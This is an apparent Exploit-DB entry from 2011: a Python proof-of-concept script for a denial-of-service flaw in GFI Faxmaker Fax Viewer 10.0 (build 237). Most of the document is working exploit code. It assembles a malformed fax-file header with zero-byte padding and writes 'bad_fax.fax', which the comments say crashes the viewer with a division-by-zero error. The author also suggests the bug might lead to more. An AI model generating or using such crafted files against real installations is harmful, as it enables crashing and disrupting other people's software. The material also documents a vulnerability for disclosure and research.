GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)

EDB-ID:

18043

CVE:



Author:

loneferret

Type:

dos


Platform:

Windows

Date:

2011-10-28


#!/usr/bin/python
 
# Title: GFI Faxmaker Fax Viewer v10.0[build 237] DoS (Poc).
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Home: http://www.kioptrix.com
# Manifacturer's link: http://www.gfi.com
  
# Date Found: Oct 28th 2011
# Tested on: Windows XP SP3 Professional English / Windows 7 Professional 64bit French
# Tested with: 32bit & 64bit versions of Faxmaker
# Nod to the Exploit-DB Team

# Software Description:
# GFI FaxMaker is a market leading fax server software for Exchange Server, 
# Lotus Domino, SMTP/POP3, which makes sending and receiving faxes an efficient, 
# simple and cheaper process. GFI FaxMaker allows users to receive and send faxes 
# directly from their email client.

# We get an "Integer division by zero" in Immunity when opening the fax file.
# Nothing fancy, but maybe something can do more... eventually.
# As always, have fun.
# loneferret

head = ("\x49\x49\x2A\x00\x08\x00\x00\x00\x10\x00\xFE\x00\x04"
"\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x01\x03\x00\x01\x00\x00\x00"
"\xC0\x06\x00\x00\x01\x01\x04\x00\x01\x00\x00\x00\x94\x08\x00\x00\x02"
"\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x01\x03\x00\x01\x00"
"\x00\x00\x03\x00\x00\x00\x06\x01\x03\x00\x01\x00\x00\x00\x00\x00\x00"
"\x0A\x01\x03\x00\x01\x00\x00\x00\x02\x00\x00\x00\x11\x01\x04\x00\x01"
"\x00\x00\x00\xDE\x00\x00\x00\x15\x01\x03\x00\x01\x00\x00\x00\x01\x00"
"\x00\x00\x16\x01\x04\x00\x01\x00\x00\x00\x94\x08\x00\x00\x17\x01\x04"
"\x00\x01\x00\x00\x00\xB0\xF8\x00\x00\x1A\x01\x05\x00\x01\x00\x00\x00"
"\xCE\x00\x00\x00\x1B\x01\x05\x00\x01\x00\x00\x00\xD6\x00\x00\x00\x1C"
"\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x24\x01\x04\x00\x01\x00"
"\x00\x00\x04\x00\x00\x00\x28\x01\x03\x00\x01\x00\x00\x00\x02\x00\x00"
"\x00\x00\x00\x00\x00\xCC\x00\x00\x00\x01\x00\x00")

buffer = "\x41" * 5
buffer += "\00" * 4 # <-- " Well there's your problem! "



badfax = head + buffer

file=open('bad_fax.fax','w')
file.write(badfax) 
file.close()